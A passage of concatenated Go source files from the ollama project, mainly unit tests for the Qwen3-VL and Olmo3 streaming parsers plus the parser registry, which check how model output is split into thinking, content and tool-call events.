"I'm content"}, }, }, }, }, { desc: "thinking and tool call and content", }, { desc: "nested thinking (outside thinking, inside thinking)", steps: []step{ { input: "I'm thinking<think>I'm nested thinking</think></think>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "I'm thinking<think>I'm nested thinking"}, qwenEventContent{content: "</think>"}, }, }, }, }, { desc: "interleaved thinking", steps: []step{ { input: "<think>I'm thinking</think>I'm actually content</think>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "<think>I'm thinking"}, qwenEventContent{content: "I'm 
actually content</think>"}, }, }, }, }, { desc: "nested thinking and tool call (outside thinking, inside tool call)", steps: []step{ { input: "I'm thinking<tool_call>I'm nested tool call</tool_call></think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "I'm thinking<tool_call>I'm nested tool call</tool_call>"}}, }, }, }, { desc: "nested thinking and tool call (outside tool call, inside thinking)", steps: []step{ { input: "<tool_call>I'm nested tool call<think>I'm thinking</think></tool_call>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "<tool_call>I'm nested tool call<think>I'm thinking"}, qwenEventContent{content: "</tool_call>"}, }, }, }, }, { desc: "interleaved thinking and tool call", steps: []step{ { input: "I'm thinking<tool_call>I'm NOT a nested tool call</think></tool_call><tool_call>I'm nested tool call 2<think></tool_call></think>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "I'm thinking<tool_call>I'm NOT a nested tool call"}, qwenEventContent{content: "</tool_call>"}, qwenEventRawToolCall{raw: "I'm nested tool call 2<think>"}, qwenEventContent{content: "</think>"}, }, }, }, }, { desc: "partial thinking tag fakeout", steps: []step{ { input: "abc</think", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}, }, { input: " fakeout", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "</think fakeout"}}, }, }, }, { desc: "partial thinking incomplete", steps: []step{ { input: "abc<think>unfinished</think", // when something is ambiguious, we dont emit anything wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc<think>unfinished"}}, }, }, }, { desc: "test with split thinking and content", steps: []step{ { input: "abc<think>unfinished</th", // when something is ambiguious, we dont emit anything wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc<think>unfinished"}}, }, { input: "ink> def", wantEvents: []qwenEvent{ qwenEventContent{content: "def"}, }, }, }, }, { desc: 
"thinking with no tags", steps: []step{ { input: "Hello I am thinking", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "Hello I am thinking"}, }, }, { input: "Hello I am thinking some more", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "Hello I am thinking some more"}, }, }, { input: "Hello I am think</think> NOT", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "Hello I am think"}, qwenEventContent{content: "NOT"}, }, }, }, }, } anyOnlies := false for _, tc := range cases { if tc.only { anyOnlies = true } } for _, tc := range cases { if anyOnlies && !tc.only { continue } t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, nil, nil) // parser.state = CollectingThinkingContent for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { // avoid deep equal on empty vs. nil slices continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents) } } }) } } func TestQwen3VLThinkingToolParser(t *testing.T) { type step struct { name string rawToolCall string tools []api.Tool wantToolCall api.ToolCall } steps := []step{ { name: "simple tool call", tools: []api.Tool{}, rawToolCall: `{"name": "get-current-weather", "arguments": {"location": "San Francisco, CA", "unit": "fahrenheit"}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "get-current-weather", Arguments: testArgs(map[string]any{ "location": "San Francisco, CA", "unit": "fahrenheit", }), }, }, }, { name: "names with spaces", tools: []api.Tool{}, rawToolCall: `{"name": "get current temperature", "arguments": {"location with spaces": "San Francisco", "unit with spaces": "celsius"}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "get current temperature", Arguments: testArgs(map[string]any{ 
"location with spaces": "San Francisco", "unit with spaces": "celsius", }), }, }, }, { name: "names with quotes", tools: []api.Tool{}, rawToolCall: `{"name": "\"get current temperature\"", "arguments": {"\"location with spaces\"": "San Francisco", "\"unit with spaces\"": "\"celsius\""}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "\"get current temperature\"", Arguments: testArgs(map[string]any{ "\"location with spaces\"": "San Francisco", "\"unit with spaces\"": "\"celsius\"", }), }, }, }, { name: "tool call with typed parameters (json types)", tools: []api.Tool{}, rawToolCall: `{"name": "calculate", "arguments": {"x": 3.14, "y": 42, "enabled": true, "items": ["a", "b", "c"]}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "calculate", Arguments: testArgs(map[string]any{ "x": 3.14, "y": float64(42), "enabled": true, "items": []any{"a", "b", "c"}, }), }, }, }, { name: "ampersands in parameter values", tools: []api.Tool{}, rawToolCall: `{"name": "exec", "arguments": {"command": "ls && echo \"done\""}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "exec", Arguments: testArgs(map[string]any{ "command": "ls && echo \"done\"", }), }, }, }, { name: "angle brackets in parameter values", tools: []api.Tool{}, rawToolCall: `{"name": "exec", "arguments": {"command": "ls && echo \"a > b and a < b\""}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "exec", Arguments: testArgs(map[string]any{ "command": "ls && echo \"a > b and a < b\"", }), }, }, }, { name: "unicode in function names and parameters", tools: []api.Tool{}, rawToolCall: `{"name": "获取天气", "arguments": {"城市": "北京", "message": "Hello! 你好! 🌟 مرحبا"}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "获取天气", Arguments: testArgs(map[string]any{ "城市": "北京", "message": "Hello! 你好! 
🌟 مرحبا", }), }, }, }, } for i, step := range steps { gotToolCall, err := parseJSONToolCall(qwenEventRawToolCall{raw: step.rawToolCall}, step.tools) if err != nil { t.Errorf("step %d (%s): %v", i, step.name, err) } if !toolCallEqual(gotToolCall, step.wantToolCall) { t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall) } } } func TestQwen3VLParserState(t *testing.T) { cases := []struct { desc string hasThinking bool last *api.Message wantState qwenParserState }{ { desc: "no thinking support => CollectingContent", hasThinking: false, last: nil, wantState: CollectingContent, }, { desc: "thinking support, no last message => CollectingThinkingContent", hasThinking: true, last: nil, wantState: CollectingThinkingContent, }, { desc: "thinking support, last assistant with empty content => CollectingThinkingContent", hasThinking: true, last: &api.Message{Role: "assistant", Content: ""}, wantState: CollectingThinkingContent, }, { desc: "thinking support, last assistant with content => CollectingContent", hasThinking: true, last: &api.Message{Role: "assistant", Content: "hello"}, wantState: CollectingContent, }, { desc: "thinking support, last is user => CollectingThinkingContent", hasThinking: true, last: &api.Message{Role: "user", Content: "hi"}, wantState: CollectingThinkingContent, }, } for _, tc := range cases { parser := Qwen3VLParser{hasThinkingSupport: tc.hasThinking} parser.Init(nil, tc.last, nil) if parser.state != tc.wantState { t.Errorf("%s: got state %v, want %v", tc.desc, parser.state, tc.wantState) } } } func TestQwen3VLThinkingParserWithThinkingPrefill(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool }{ { desc: "thinking prefill", steps: []step{ {input: "abc</think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}}, }, }, { desc: "thinking prefill with content", steps: []step{ {input: "abc</th", wantEvents: 
[]qwenEvent{qwenEventThinkingContent{content: "abc"}}}, {input: "ink> def", wantEvents: []qwenEvent{qwenEventContent{content: "def"}}}, }, }, { desc: "thinking prefill with fakeout", steps: []step{ {input: "abc</think", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}}, {input: " fakeout </think", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "</think fakeout"}}}, {input: ">", wantEvents: []qwenEvent{}}, }, }, { desc: "thinking prefill with spaces", steps: []step{ {input: " </think> starting content", wantEvents: []qwenEvent{qwenEventContent{content: "starting content"}}}, }, }, } last := &api.Message{Role: "assistant", Thinking: "i am thinking"} // so if there is thinking the test is still thinking for _, tc := range cases { t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, last, nil) for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { // avoid deep equal on empty vs. 
nil slices continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents) } } }) } } func TestQwen3VLThinkingParserWithNonThinkingPrefill(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool }{ { desc: "thinking prefill", steps: []step{ {input: "abc</think>", wantEvents: []qwenEvent{qwenEventContent{content: "abc</think>"}}}, }, }, { desc: "thinking prefill with content", steps: []step{ {input: "abc</th", wantEvents: []qwenEvent{qwenEventContent{content: "abc</th"}}}, {input: "ink> def", wantEvents: []qwenEvent{qwenEventContent{content: "ink> def"}}}, }, }, { desc: "thinking prefill with fakeout", steps: []step{ {input: "abc</think", wantEvents: []qwenEvent{qwenEventContent{content: "abc</think"}}}, {input: " fakeout </think", wantEvents: []qwenEvent{qwenEventContent{content: " fakeout </think"}}}, {input: ">", wantEvents: []qwenEvent{qwenEventContent{content: ">"}}}, }, }, { desc: "thinking prefill with spaces", steps: []step{ {input: " </think> starting content", wantEvents: []qwenEvent{qwenEventContent{content: " </think> starting content"}}}, }, }, } last := &api.Message{Role: "assistant", Thinking: "i am thinking", Content: "i am content"} // so if there is thinking the test is still thinking for _, tc := range cases { t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, last, nil) for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { // avoid deep equal on empty vs. 
nil slices continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents) } } }) } } func TestQwen3VLThinkingParserStreamingAssistantPrefillContent(t *testing.T) { // last message is assistant with content ⇒ start in CollectingContent last := &api.Message{Role: "assistant", Content: "has content"} parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, last, nil) type step struct { input string wantEvents []qwenEvent } steps := []step{ {input: "abc</think>", wantEvents: []qwenEvent{qwenEventContent{content: "abc</think>"}}}, {input: "<tool_call>{\"name\": \"x\", \"arguments\": {}}</tool_call>", wantEvents: []qwenEvent{qwenEventRawToolCall{raw: "{\"name\": \"x\", \"arguments\": {}}"}}}, } for i, s := range steps { parser.buffer.WriteString(s.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(s.wantEvents) == 0 { continue } if !reflect.DeepEqual(gotEvents, s.wantEvents) { t.Fatalf("step %d: input %q: got %#v, want %#v", i, s.input, gotEvents, s.wantEvents) } } } func TestQwen3VLThinkingWhitespaceHandling(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool }{ { desc: "whitespace after thinking tag is trimmed", steps: []step{ { input: "thinking content</think> \n\t content starts here", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking content"}, qwenEventContent{content: "content starts here"}, }, }, }, }, { desc: "whitespace after thinking tag split across chunks", steps: []step{ { input: "thinking content</think> ", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "thinking content"}}, }, { input: " \n\t", wantEvents: []qwenEvent{}, }, { input: "content", wantEvents: []qwenEvent{ qwenEventContent{content: "content"}, }, }, }, }, { desc: "only whitespace after thinking tag", steps: []step{ { input: "thinking content</think> \n\t 
", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "thinking content"}}, }, }, }, { desc: "multiple spaces and tabs after thinking", steps: []step{ { input: "think</think> \t\t\n\n text", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "think"}, qwenEventContent{content: "text"}, }, }, }, }, { desc: "trailing whitespace before thinking tag is preserved in content", steps: []step{ { input: "thinking with spaces </think>text", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking with spaces"}, qwenEventContent{content: "text"}, }, }, }, }, { desc: "whitespace between thinking and tool call", steps: []step{ { input: "thinking</think> \n <tool_call>{\"name\":\"test\"}</tool_call>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking"}, qwenEventRawToolCall{raw: "{\"name\":\"test\"}"}, }, }, }, }, { desc: "no whitespace after thinking tag", steps: []step{ { input: "thinking</think>content", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking"}, qwenEventContent{content: "content"}, }, }, }, }, { desc: "unicode whitespace after thinking tag", steps: []step{ { input: "thinking</think>\u00a0\u3000content", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking"}, qwenEventContent{content: "content"}, }, }, }, }, { desc: "whitespace split with partial thinking tag", steps: []step{ { input: "thinking</th", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "thinking"}}, }, { input: "ink> \n", wantEvents: []qwenEvent{}, }, { input: " content", wantEvents: []qwenEvent{ qwenEventContent{content: "content"}, }, }, }, }, { desc: "empty thinking tag with whitespace after", steps: []step{ { input: "</think> \ncontent", wantEvents: []qwenEvent{ qwenEventContent{content: "content"}, }, }, }, }, { desc: "whitespace inside tool call preserves trailing space", steps: []step{ { input: "bruh</think> \n \n \n \n \n \n blahhhhhhhhhh blahhhh blahhhh \n\n\n\t\t <tool_call> tool content </tool_call> 
\n\n\n\n\n\n\n after", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "bruh"}, qwenEventContent{content: "blahhhhhhhhhh blahhhh blahhhh"}, qwenEventRawToolCall{raw: " tool content "}, qwenEventContent{content: "after"}, }, }, }, }, { desc: "whitespace inside tool call preserves trailing space", steps: []step{ { input: "bruh</think> shdjfhksdhfj ", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "bruh"}, qwenEventContent{content: "shdjfhksdhfj"}, }, }, { input: "another word ", wantEvents: []qwenEvent{ qwenEventContent{content: " another word"}, }, }, { input: "<tool_call> tool content </tool_call> ", wantEvents: []qwenEvent{ qwenEventRawToolCall{raw: " tool content "}, }, }, { input: "\n \n \n \n \n \n blahhhhhhhhhh blahhhh blahhhh \n\n\n\t\t <tool_call> anotha one </tool_call> \n\n\n\n\n\n\n after \n\n\n\n\n\n blep", wantEvents: []qwenEvent{ qwenEventContent{content: "blahhhhhhhhhh blahhhh blahhhh"}, qwenEventRawToolCall{raw: " anotha one "}, qwenEventContent{content: "after \n\n\n\n\n\n blep"}, }, }, }, }, } anyOnlies := false for _, tc := range cases { if tc.only { anyOnlies = true } } for _, tc := range cases { if anyOnlies && !tc.only { continue } t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, nil, nil) for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents) } } }) } } func TestQwen3VLToolCallWhitespaceHandling(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool prefillMsg *api.Message // allows starting in content mode instead of thinking mode }{ { desc: "whitespace inside tool call is fully preserved (with content prefill)", prefillMsg: 
&api.Message{Role: "assistant", Content: "prefill"}, steps: []step{ { input: "before<tool_call> tool content </tool_call> \n after", wantEvents: []qwenEvent{ qwenEventContent{content: "before"}, qwenEventRawToolCall{raw: " tool content "}, qwenEventContent{content: "after"}, }, }, }, }, { desc: "whitespace after tool call trimmed across chunks (with content prefill)", prefillMsg: &api.Message{Role: "assistant", Content: "prefill"}, steps: []step{ { input: "before<tool_call>tool</tool_call> ", wantEvents: []qwenEvent{ qwenEventContent{content: "before"}, qwenEventRawToolCall{raw: "tool"}, }, }, { input: "\n\t", wantEvents: []qwenEvent{}, }, { input: "after \n this is a song", wantEvents: []qwenEvent{ qwenEventContent{content: "after \n this is a song"}, }, }, }, }, { desc: "multiple tool calls with whitespace between (with content prefill)", prefillMsg: &api.Message{Role: "assistant", Content: "prefill"}, steps: []step{ { input: "<tool_call>first</tool_call> \n <tool_call>second</tool_call>", wantEvents: []qwenEvent{ qwenEventRawToolCall{raw: "first"}, qwenEventRawToolCall{raw: "second"}, }, }, }, }, { desc: "thinking with whitespace then tool call", steps: []step{ { input: "thinking</think> \n <tool_call>tool</tool_call> \n content", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking"}, qwenEventRawToolCall{raw: "tool"}, qwenEventContent{content: "content"}, }, }, }, }, } anyOnlies := false for _, tc := range cases { if tc.only { anyOnlies = true } } for _, tc := range cases { if anyOnlies && !tc.only { continue } t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, tc.prefillMsg, nil) for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, 
step.wantEvents) } } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/parsers.go
model/parsers/parsers.go
package parsers import ( "strings" "unicode" "github.com/ollama/ollama/api" "github.com/ollama/ollama/harmony" ) type Parser interface { // Init initializes the parser with tools, optional last message for chat prefill, and think value // Returns processed tools if the parser needs to modify them (e.g., harmony renames them) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool // Add processes streamed content and returns parsed content, thinking, and tool calls // The done flag indicates if this is the last chunk (used for draining accumulators) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) HasToolSupport() bool HasThinkingSupport() bool } type ParserConstructor func() Parser type ParserRegistry struct { constructors map[string]ParserConstructor } func (r *ParserRegistry) Register(name string, constructor ParserConstructor) { r.constructors[name] = constructor } var registry = ParserRegistry{ constructors: make(map[string]ParserConstructor), } func Register(name string, constructor ParserConstructor) { registry.Register(name, constructor) } func ParserForName(name string) Parser { if parser, ok := registry.constructors[name]; ok { return parser() } var p Parser switch name { case "qwen3-coder": p = &Qwen3CoderParser{} case "qwen3-vl-instruct": p = &Qwen3VLParser{hasThinkingSupport: false} case "qwen3-vl-thinking": p = &Qwen3VLParser{hasThinkingSupport: true} case "ministral": p = &MinistralParser{hasThinkingSupport: false} case "passthrough": return &PassthroughParser{} case "harmony": return harmony.NewHarmonyMessageHandler() case "cogito": return &CogitoParser{} case "deepseek3": return &DeepSeek3Parser{hasThinkingSupport: true} case "olmo3": return &Olmo3Parser{} case "olmo3-think": return &Olmo3ThinkParser{} case "nemotron-3-nano": return &Nemotron3NanoParser{} case "functiongemma": return &FunctionGemmaParser{} default: return nil } return p } type PassthroughParser struct{} func 
(p *PassthroughParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { return tools // passthrough doesn't modify tools } func (p *PassthroughParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { return s, "", nil, nil } func (p *PassthroughParser) HasToolSupport() bool { return false } func (p *PassthroughParser) HasThinkingSupport() bool { return false } func splitAtTag(sb *strings.Builder, tag string, trimAfter bool) (string, string) { split := strings.SplitN(sb.String(), tag, 2) if len(split) == 1 { sb.Reset() return split[0], "" } before := split[0] before = strings.TrimRightFunc(before, unicode.IsSpace) after := split[1] if trimAfter { after = strings.TrimLeftFunc(after, unicode.IsSpace) } sb.Reset() sb.WriteString(after) return before, after // return events }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/olmo3_think_test.go
model/parsers/olmo3_think_test.go
package parsers

import (
	"strings"
	"testing"

	"github.com/google/go-cmp/cmp"

	"github.com/ollama/ollama/api"
)

// TestOlmo3ThinkParser feeds each input as a single chunk and checks the
// resulting content/thinking split. No tool calls are ever expected because
// Olmo3ThinkParser does not support tools.
func TestOlmo3ThinkParser(t *testing.T) {
	tests := []struct {
		name             string
		input            string
		expectedContent  string
		expectedThinking string
		lastMessage      *api.Message // non-nil assistant message simulates chat prefill
	}{
		{
			name:             "thinking_only",
			input:            "I need to think about this.</think>Here is my response.",
			expectedContent:  "Here is my response.",
			expectedThinking: "I need to think about this.",
		},
		{
			name:             "thinking_with_newlines",
			input:            "Let me think step by step.\n\n1. First point\n2. Second point</think>The answer is 42.",
			expectedContent:  "The answer is 42.",
			expectedThinking: "Let me think step by step.\n\n1. First point\n2. Second point",
		},
		{
			name:             "thinking_then_content",
			input:            "Deep thinking here.</think>Here is my detailed response with multiple sentences. I have thought carefully.",
			expectedContent:  "Here is my detailed response with multiple sentences. I have thought carefully.",
			expectedThinking: "Deep thinking here.",
		},
		{
			name:             "empty_thinking",
			input:            "</think>Just content here.",
			expectedContent:  "Just content here.",
			expectedThinking: "",
		},
		{
			// Prefill with existing assistant content means the parser starts
			// in content mode and never looks for </think>.
			name:            "prefill_skips_thinking",
			input:           "Continuing from previous content.",
			expectedContent: "Continuing from previous content.",
			lastMessage: &api.Message{
				Role:    "assistant",
				Content: "Previous content",
			},
		},
		{
			// Whitespace around </think> is trimmed on both sides; trailing
			// whitespace of the final content is preserved.
			name:             "thinking_with_whitespace",
			input:            " Some thinking </think> Content here ",
			expectedContent:  "Content here ",
			expectedThinking: " Some thinking",
		},
		{
			name:             "real_model_output_with_newlines",
			input:            "Yes, that should work. Let me go with that response.\n\n</think>\n\nHi! I'm all set and ready to assist. How about you? How are you today? 😊",
			expectedThinking: "Yes, that should work. Let me go with that response.",
			expectedContent:  "Hi! I'm all set and ready to assist. How about you? How are you today? 😊",
		},
		// Edge cases
		{
			// Only the FIRST </think> ends thinking; later ones are content.
			name:             "nested_think_tags_in_thinking",
			input:            "I'm thinking <think>nested</think> more thinking</think>Final content.",
			expectedContent:  "more thinking</think>Final content.",
			expectedThinking: "I'm thinking <think>nested",
		},
		{
			name:             "multiple_think_close_tags",
			input:            "First thinking</think>Content</think>More content.",
			expectedContent:  "Content</think>More content.",
			expectedThinking: "First thinking",
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			parser := &Olmo3ThinkParser{}
			parser.Init(nil, tt.lastMessage, nil)

			content, thinking, toolCalls, err := parser.Add(tt.input, true)
			if err != nil {
				t.Fatalf("Add() error = %v", err)
			}

			if diff := cmp.Diff(tt.expectedContent, content); diff != "" {
				t.Errorf("content mismatch (-want +got):\n%s", diff)
			}
			if diff := cmp.Diff(tt.expectedThinking, thinking); diff != "" {
				t.Errorf("thinking mismatch (-want +got):\n%s", diff)
			}

			// No tool calls expected
			if len(toolCalls) > 0 {
				t.Errorf("expected no tool calls, got %d", len(toolCalls))
			}
		})
	}
}

// TestOlmo3ThinkParser_Streaming verifies that content and thinking
// accumulated across several Add calls equal the single-chunk result.
func TestOlmo3ThinkParser_Streaming(t *testing.T) {
	parser := &Olmo3ThinkParser{}
	parser.Init(nil, nil, nil)

	chunks := []string{
		"I am ",
		"thinking about",
		" this.</think>Here ",
		"is the response.",
	}

	var finalContent, finalThinking strings.Builder
	for i, chunk := range chunks {
		done := i == len(chunks)-1
		content, thinking, _, err := parser.Add(chunk, done)
		if err != nil {
			t.Fatalf("Add() error on chunk %d: %v", i, err)
		}
		finalContent.WriteString(content)
		finalThinking.WriteString(thinking)
	}

	expectedContent := "Here is the response."
	expectedThinking := "I am thinking about this."
	if finalContent.String() != expectedContent {
		t.Errorf("expected content %q, got %q", expectedContent, finalContent.String())
	}
	if finalThinking.String() != expectedThinking {
		t.Errorf("expected thinking %q, got %q", expectedThinking, finalThinking.String())
	}
}

// TestOlmo3ThinkParser_StreamingEdgeCases covers </think> tags that are
// split across chunk boundaries in various ways.
func TestOlmo3ThinkParser_StreamingEdgeCases(t *testing.T) {
	tests := []struct {
		name             string
		chunks           []string
		expectedContent  string
		expectedThinking string
	}{
		{
			name: "thinking_tag_split_across_chunks",
			chunks: []string{
				"This is thinking content",
				"</think>",
				"This is content.",
			},
			expectedContent:  "This is content.",
			expectedThinking: "This is thinking content",
		},
		{
			name: "thinking_tag_split_mid_token",
			chunks: []string{
				"Thinking?</",
				"think>",
				"Content here.",
			},
			expectedContent:  "Content here.",
			expectedThinking: "Thinking?",
		},
		{
			name: "thinking_tag_split_at_angle_bracket",
			chunks: []string{
				"Thinking<",
				"/think>",
				"Content.",
			},
			expectedContent:  "Content.",
			expectedThinking: "Thinking",
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			parser := &Olmo3ThinkParser{}
			parser.Init(nil, nil, nil)

			var finalContent, finalThinking strings.Builder
			for i, chunk := range tt.chunks {
				done := i == len(tt.chunks)-1
				content, thinking, _, err := parser.Add(chunk, done)
				if err != nil {
					t.Fatalf("Add() error on chunk %d: %v", i, err)
				}
				finalContent.WriteString(content)
				finalThinking.WriteString(thinking)
			}

			if finalContent.String() != tt.expectedContent {
				t.Errorf("expected content %q, got %q", tt.expectedContent, finalContent.String())
			}
			if finalThinking.String() != tt.expectedThinking {
				t.Errorf("expected thinking %q, got %q", tt.expectedThinking, finalThinking.String())
			}
		})
	}
}

// TestOlmo3ThinkParser_ThinkBoundary tests streaming thinking content
// where thinking chunks come in succession before the </think> tag
func TestOlmo3ThinkParser_ThinkBoundary(t *testing.T) {
	tests := []struct {
		name             string
		chunks           []string
		expectedThinking string
		expectedContent  string
	}{
		{
			name: "multiple_thinking_chunks",
			chunks: []string{
				"First part of thinking. ",
				"Second part of thinking. ",
				"Third part.</think>",
				"Content here.",
			},
			expectedThinking: "First part of thinking. Second part of thinking. Third part.",
			expectedContent:  "Content here.",
		},
		{
			name: "thinking_chunks_with_newlines",
			chunks: []string{
				"Step 1: Analyze the problem.\n",
				"Step 2: Consider options.\n",
				"Step 3: Make decision.</think>",
				"Here is my answer.",
			},
			expectedThinking: "Step 1: Analyze the problem.\nStep 2: Consider options.\nStep 3: Make decision.",
			expectedContent:  "Here is my answer.",
		},
		{
			name: "single_char_thinking_chunks",
			chunks: []string{
				"H", "e", "l", "l", "o", "</think>", "World",
			},
			expectedThinking: "Hello",
			expectedContent:  "World",
		},
		{
			name: "thinking_with_special_chars",
			chunks: []string{
				"Let me think... ",
				"Option A: $100 ",
				"Option B: €200</think>",
				"I recommend Option A.",
			},
			expectedThinking: "Let me think... Option A: $100 Option B: €200",
			expectedContent:  "I recommend Option A.",
		},
		{
			name: "long_thinking_multiple_chunks",
			chunks: []string{
				"This is a very long thinking process. ",
				"I need to consider many factors. ",
				"First, let me look at the data. ",
				"The numbers show interesting patterns. ",
				"Based on my analysis, ",
				"I can conclude that...</think>",
				"The answer is 42.",
			},
			expectedThinking: "This is a very long thinking process. I need to consider many factors. First, let me look at the data. The numbers show interesting patterns. Based on my analysis, I can conclude that...",
			expectedContent:  "The answer is 42.",
		},
		{
			name: "thinking_ends_exactly_at_chunk_boundary",
			chunks: []string{
				"Thinking content",
				"</think>",
				"Content",
			},
			expectedThinking: "Thinking content",
			expectedContent:  "Content",
		},
		{
			name: "empty_chunks_between_thinking",
			chunks: []string{
				"Start thinking",
				"",
				" middle ",
				"",
				"end</think>",
				"Content",
			},
			expectedThinking: "Start thinking middle end",
			expectedContent:  "Content",
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			parser := &Olmo3ThinkParser{}
			parser.Init(nil, nil, nil)

			var finalContent, finalThinking strings.Builder
			for i, chunk := range tt.chunks {
				done := i == len(tt.chunks)-1
				content, thinking, _, err := parser.Add(chunk, done)
				if err != nil {
					t.Fatalf("Add() error on chunk %d: %v", i, err)
				}
				finalContent.WriteString(content)
				finalThinking.WriteString(thinking)
			}

			if finalThinking.String() != tt.expectedThinking {
				t.Errorf("thinking mismatch:\nexpected: %q\ngot: %q", tt.expectedThinking, finalThinking.String())
			}
			if finalContent.String() != tt.expectedContent {
				t.Errorf("content mismatch:\nexpected: %q\ngot: %q", tt.expectedContent, finalContent.String())
			}
		})
	}
}

// TestOlmo3ThinkParser_StateTransitions tests that state transitions work correctly
func TestOlmo3ThinkParser_StateTransitions(t *testing.T) {
	t.Run("thinking_to_content", func(t *testing.T) {
		parser := &Olmo3ThinkParser{}
		parser.Init(nil, nil, nil)

		if parser.state != olmo3CollectingThink {
			t.Errorf("initial state should be olmo3CollectingThink, got %v", parser.state)
		}

		parser.Add("thinking</think>content", true)

		if parser.state != olmo3CollectingContent {
			t.Errorf("state after </think> should be olmo3CollectingContent, got %v", parser.state)
		}
	})
}

func TestOlmo3ThinkParser_HasToolSupport(t *testing.T) {
	parser := &Olmo3ThinkParser{}
	if parser.HasToolSupport() {
		t.Error("Olmo3ThinkParser should NOT support tools")
	}
}

func TestOlmo3ThinkParser_HasThinkingSupport(t *testing.T) {
	parser := &Olmo3ThinkParser{}
	if !parser.HasThinkingSupport() {
		t.Error("Olmo3ThinkParser should support thinking")
	}
}

// TestOlmo3ThinkParser_Init checks that Init passes tools through unchanged
